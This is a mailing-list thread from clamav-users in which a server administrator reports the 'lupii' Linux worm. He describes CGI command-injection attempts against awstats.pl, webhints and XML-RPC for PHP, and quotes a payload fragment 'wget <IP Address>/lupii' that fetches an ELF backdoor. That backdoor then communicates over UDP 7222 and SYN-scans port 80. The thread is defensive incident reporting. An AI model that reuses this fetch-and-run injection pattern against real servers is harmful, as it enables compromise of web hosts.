Hi, I couldn't help it and I ran the program, of course with a sniffer on. Syntax: lupii <IP_address_of_the_reporting_host> Here's what I found: 1. runs on RedHat Enterprise Workstation 4 2. opens up udp:7222 3. Exchanges some info with <IP_address_of_the_reporting_host> over udp 7222 4. remains active in the background 5. starts a SYN scan to port 80 on random destinations, this particular example it used a class A address, keeping the first 2 octets unchanged and changing just the last 2 octets of the address, in order from X.Y.0.0 to X.Y.z.w. 6. it doesn't seem to be downloading anything from the Internet 7. It tries several ways to infect the scanned system, all are based on CGI command execution/code injection: awstats.pl, webhints, xml-rp for php etc. You can see all these if you look at the program code.
I stopped the program but I have the capture. Any news from anybody else ? Tudor __________________ Hi again everyone, Got the same thing few minutes ago, coming from China this time, pointing to the same address for the download .... Seems to be spreading ? The downloaded file is definitely for Linux. Tudor __________________ Hi everyone, Last night I caught an attack to my web servers here, the attack consisted in command execution attempts using various CGI vulnerabilities. The fact is that after looking at the payload of all connection attempts, they all had a "wget <IP Address>/lupii", same IP address, I can send it to the list if anybody needs it. I downloaded the file from that site, it is an elf executable and it seems to be a backdoor of some sort reporting back to the site. The attack was coming from Taiwan and the download site was in Norway. I am not good at looking at elf format programs, is anybody willing to take a look ? I can send the file on demand. Does anybody know what is this all about ? Thanks, Tudor _______________________________________________ http://lurker.clamav.net/list/clamav-users.html
